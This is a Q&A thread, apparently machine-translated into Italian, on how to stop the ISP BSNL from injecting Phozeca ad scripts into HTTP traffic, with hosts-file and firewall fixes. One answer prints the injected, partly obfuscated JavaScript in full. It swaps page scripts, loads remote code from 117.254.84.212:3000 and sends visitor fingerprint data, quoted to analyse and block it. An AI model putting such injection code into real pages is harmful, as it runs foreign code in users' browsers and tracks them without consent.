Il mio ISP (BSNL India) sta inserendo annunci usando Phozeca che rovina i siti Web e li rende insensibili, può essere fatto qualcosa?

Prima prova ad andare d'accordo con il tuo ISP per smettere di farlo (se applicabile)

Come accennato, non è possibile compromettere HTTPS, quindi cerca di utilizzare HTTPS dove possibile.

Informazioni sui tuoi prossimi tentativi

1) Checking hosts file and blocking the domain: Not working. The script is still being injected.

Deve funzionare, se così non fosse, lo stai facendo male. Un altro modo è bloccare la stessa cosa con il tuo modem o router domain / ip block (o firewall)

Se il tuo ISP è abbastanza intelligente, dovrebbe ospitare gli script con vari nomi di dominio, quindi bloccarli tutti sarà difficile per te.

2) Scanning the PC for malware

Non funzionerà ovviamente

3) Disabling CSP (Content Security Policy)

Non ho idea di cosa sia questo, ma dal momento che HTTP viene fornito con sicurezza zero, questo CSP potrebbe essere ingannato, o / e non può dire se un contenuto non è permesso (quale logica?)

4) Changed DNS to Google's DNS

Naturalmente non funzionerà, il problema che hai riguarda il post dns. anche se il tuo ISP sostituisce il risultato con la risoluzione del dominio, è ancora semplice posizionare il componente aggiuntivo in http.

100% soluzioni di lavoro
Usa una VPN o uno sTunnel che si lega a servizi come il calamaro dietro. Questo potrebbe non funzionare se il tuo ISP trova la tua connessione al IP di destinazione (VPN o sTunnel) come criterio anti-annuncio.

50% soluzioni di lavoro
Blocca tutti i contenuti tramite il plug-in Adblock del browser (o qualsiasi altra cosa).

Ho avuto problemi simili. Ho un semplice trucco ma è temporaneo, ma sta funzionando per me e ha impedito a BSNL ISP di tracciare e spingere il popup AD del malware. Ho aggiunto una voce host nel mio computer per bsnl.phozeca.com e l'ho indirizzata a localhost.

Come suggerito da Preetam - aggiungendo ulteriori dettagli.

1. Ho scaricato il file hosts dal link Sostituito in questa posizione C: \ Windows \ System32 \ drivers \ etc

2. Se non sai come sostituire il file hosts, puoi seguire questa istruzione link

3. Per eliminare il popup da engine.spotscenered.info/link.engine?guid= Ho aggiunto le seguenti voci all'interno del file host:

   0.0.0.0 www.onclickmax.com
   0.0.0.0 bsnl.phozeca.com
   0.0.0.0 * .onclickmax.com
   0.0.0.0 phozeca.com
   0.0.0.0 c.phozeca.com
   

Non vedo nessun annuncio popup ... andato!

Sembra che il malware si sia evoluto.

Ora utilizza un IP e si sta iniettando se stesso nei file js dei siti web "http" (utilizzato un proxy per l'analisi).

Ad esempio, nel caso di bbc.co.uk, quando il browser richiede l'url seguente:

link

instead of the below script (original) :

define(["idcta/idCookie","idcta/id-config","idcta/apiUtils"],function(d,c,h){var b={};function e(j){try{this.id=null;this.element=null;this.ctaLink=null;this.ctaName=null;if(f(j)){this.id=j.id;this.element=document.getElementById(j.id);if(!j.blq){this.ctaLink=document.getElementById("idcta-link");this.ctaName=this.element.getElementsByTagName("span")[0]}else{this.ctaLink=document.getElementById(j["link-id"])?document.getElementById(j["link-id"]):this.element.getElementsByTagName("a")[0];this.ctaName=j["name-id"]?document.getElementById(j["name-id"]):this.element.getElementsByTagName("span")[1]}var i=this;if(j.publiclyCacheable===true){if(d.getInstance().hasCookie()){if(c.status_url&&i.ctaLink.href!==c.status_url){i.ctaLink.href=c.status_url}a(i,d.getInstance())}else{if(c.signin_url){i.ctaLink.href=c.signin_url}i.ctaName.innerHTML=c.translation_signedout}}}}catch(k){h.logCaughtError(k)}}function a(m,k){try{var j=k.getNameFromCookie()||c.translation_signedin;var i=c.translation_signedin;if(j){i=g(j,14)}m.element.className=m.element.className+" idcta-signedin";m.ctaName.innerHTML=i}catch(l){h.logCaughtError(l)}}function g(j,i){if(j.length>i){return j.substring(0,i-1)+"…"}return j}function f(i){if(!document.getElementById(i.id)){return false}if(!i.blq&&!document.getElementById("idcta-link")){return false}if(i.blq&&!document.getElementById(i["link-id"])){return false}return true}b.Statusbar=e;b.updateForAuthorisedState=a;return b});

the malware (isp-end?) injected the below js malacious script :

!function(){var a="/id/0.37.24/modules/idcta/statusbar.js",r=null,e=document.getElementsByTagName("script"),i=e.length,n=null,t=Date.now(),s=null,o=0;for("/"===a.substring(0,1)&&(a=a.substring(1)),o=0;o<i;o+=1)
if(void 0!==e[o].src&&null!==e[o].src&&e[o].src.indexOf(a)>-1){n=o,r=e[o];break}
void 0!==r&&null!==r||(r=document.getElementsByTagName("script")[0]),s=r.src.indexOf("?")>-1?r.src+"&cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag":r.src+"?cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";try{if(void 0===window.sarazasarazaNoti||null===window.sarazasarazaNoti||window.sarazasarazaNoti===Array&&window.sarazasarazaNoti.indexOf(r.src)<0){void 0!==window.sarazasarazaNoti&&null!==window.sarazasarazaNoti||(window.sarazasarazaNoti=new Array),window.sarazasarazaNoti.push(r.src);var c=r.parentNode,d=r;if(r.async||r.defer||null!==n&&n!==e.length-1){var w=document.createElement("script");w.src=s,c.replaceChild(w,d)}else document.write("<script type='text/javascript' src="+s+"><\/script>"),c.removeChild(d)}
var a1="117.254.84.212";var a2="3000";if(window===window.top&&(void 0===window.sarazasaraza||null===window.sarazasaraza||!window.sarazasaraza)){window.sarazasaraza=!0;var l=a1+":"+a2+"/getjs?nadipdata="+JSON.stringify("%7B%22url%22:%22%2Fid%2F0.37.24%2Fmodules%2Fidcta%2Fstatusbar.js%22%2C%22referer%22:%22http:%2F%2Fwww.bbc.com%2F%22%2C%22host%22:%22static.bbc.co.uk%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D")+"&screenheight="+screen.height+"&screenwidth="+screen.width+"&tm="+(new Date).getTime()+"&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0";!function(a,r,e,i,n,t,s){t=r.createElement(e),s=r.getElementsByTagName(e)[0],t.async=!0,t.src=i,s.parentNode.insertBefore(t,s)}(window,document,"script","//"+l)}
var imgtag=document.createElement('img');imgtag.height='1';imgtag.width='1';imgtag.style='border-style:none;';imgtag.alt='';imgtag.src='//'+a1+":"+a2+"/pixel/1x1.png"}catch(a){}}()

La correzione che ha funzionato è stata l'aggiunta di una regola nel firewall in modo da bloccare la porta 3000 nell'intervallo di bsnl 117.192.0.0 117.255.255.255 (basato sulle informazioni di ultra-dns).

Ciò è avvenuto sia a livello di sistema che a livello di router asdl (poiché anche i dispositivi mobili che utilizzano la rete sono interessati).

Speriamo che questo minimizzi i conflitti con altre applicazioni che usano la porta 3000.

Per windows-os, il video sulla porta di blocco può essere trovato qui: link

Saluti

Ravindra

L'ho già scritto su India Broadband Forum. Devi bloccare 3 siti web tramite il filtro URL o il blocco degli host: mutualvehemence.com bsnl.phozeca.com:3000 (o c.phozeca.com:3000) decademical.com

WHOIS il 2 ° sito web e ti renderai conto che Bsnl stesso sta iniettando questi annunci. L'indirizzo registrato del server dice NS Cell, BSNL ecc. Quindi la sede centrale di bsnl è responsabile di questo. (NS è probabilmente sorveglianza di rete). Altri siti web di questo tipo verranno pubblicati per JS Injection poiché il 2 ° sito Web non è stato precedentemente utilizzato per l'iniezione

Soluzione semplice: Visitare qualsiasi sito Web http e fare clic con il tasto destro del mouse in qualsiasi punto della pagina. Quindi fai clic su Controlla elemento e fai clic sulla scheda Fonti e guarda tutte le fonti. Uno di questi avrà un file JS offuscato (se non bloccato), che è la ragione per gli annunci popup. Blocca quell'URL.